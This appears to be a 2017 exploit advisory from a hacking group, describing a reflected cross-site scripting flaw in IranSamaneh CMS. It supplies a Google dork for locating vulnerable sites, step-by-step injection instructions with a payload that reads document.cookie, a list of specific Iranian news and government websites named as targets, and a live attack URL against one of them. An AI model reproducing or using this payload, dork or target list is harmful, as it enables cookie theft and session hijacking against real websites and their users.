########################## # Exploit Title: IranSamaneh CMS Cross Site Scripting # Google Dork: intext:"طراحی و تولید: " ایران سامانه " " intitle:آرشیو # Date: 2017-04-05 # Exploit Author: Sh4dow # My Team:Zero Security Group # Vendor Homepage: https://iransamaneh.com/ # Software Link: - # Version: all # Tested on: Kali Linux # CVE : - ########################## Description: IranSamaneh System design and development of web-based systems designed to host corporate portal News Agency ----------------- Proof Step To Step Do It: 1- Use Dork In Google And Choose a Site: 2- Change URL(fa/archive?service_id=-1&sec_id=-1&cat_id=-1&rpp=20&from_date=1392/07/06&to_date=1396/01/16&p=2) 3- Now Use XSS Script in (from_data= or to_data=) # ExampleDemo Bypass Script: ( `'"><b><script>alert(document.cookie)</script></b> ) # Demo: http://tabnak.ir/ http://yjc.ir/ http://www.irinn.ir/ http://iribnews.ir// http://kayhan.ir// http://csr.ir http://www.mashreghnews.ir/ http://www.fardanews.com/ http://navideshahed.com/ http://aghigh.ir/ http://www.seratnews.ir/ http://pedalnews.ir/ http://iana.ir/ http://apic.co/ http://javanonline.ir/ # You can Finde Many Site by using Google Dork ---------------------------------------- Live Demo: http://www.tabnak.ir/fa/archive?service_id=-1&sec_id=-1&cat_id=-1&rpp=20&from_date=1392/07/06&to_date=`%27%22%3E%3Cb%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C/b%3E&p=2 ---------------------------------------- # # Msg:Brother SOLTAN SILENT Returned # #--------------------------------------- # Greetz :Ghostman And My Pc # We Are:Sh4dow - Ghostman - SOLTAN SILENT - And All Member # Iranian Underground Researchers # https://telegram.me/ZeroSecOfficial